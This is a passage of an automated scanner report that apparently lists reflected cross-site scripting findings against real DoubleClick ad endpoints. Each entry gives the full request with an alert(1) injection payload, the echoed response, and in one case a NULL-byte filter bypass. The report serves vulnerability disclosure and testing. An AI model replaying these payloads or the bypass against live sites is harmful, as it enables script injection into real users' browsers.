Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:13:27 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:13:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7182

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fsc
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f8a5"-alert(1)-"9a5b399f5f2 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:15:40 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:15:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7182

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
i94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8293c"-alert(1)-"5a363da0fe6 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:14:10 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:14:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7191

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
EwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP111C519S512N0B2A1D688E0000V101%26promo%3DBCXXX04226");
var fscUrl =
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8acd0"-alert(1)-"583d7c1bf92 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:15:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:15:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7143

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0073ec1"-alert(1)-"252bbba8c84 was submitted in the sz parameter. This input was echoed as 73ec1"-alert(1)-"252bbba8c84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7060
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:12:56 GMT
Expires: Mon, 07 Mar 2011 13:12:56 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/7/1a9/%2a/m%3B234427573%3B0-0%3B0%3B50265527%3B3454-728/90%3B38432219/38449976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNv
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbfa'-alert(1)-'59510ce7fea was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70afbfa'-alert(1)-'59510ce7fea&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:40:15 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:40:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70afbfa'-alert(1)-'59510ce7fea&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6fcd'-alert(1)-'419279fa279 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028a6fcd'-alert(1)-'419279fa279&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:39:36 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:39:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028a6fcd'-alert(1)-'419279fa279&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec6ca'-alert(1)-'f51a1f2bbf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bec6ca'-alert(1)-'f51a1f2bbf&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:40:55 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:40:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 519

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a5/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bec6ca'-alert(1)-'f51a1f2bbf&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3fe5'-alert(1)-'94dbc11099d was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=c3fe5'-alert(1)-'94dbc11099d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 520
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:41:33 GMT
Expires: Mon, 07 Mar 2011 01:41:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=c3fe5'-alert(1)-'94dbc11099dhttps%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e51c3'-alert(1)-'5d2e0e24608 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832e51c3'-alert(1)-'5d2e0e24608&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:39:11 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832e51c3'-alert(1)-'5d2e0e24608&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]  previous  next

Summary

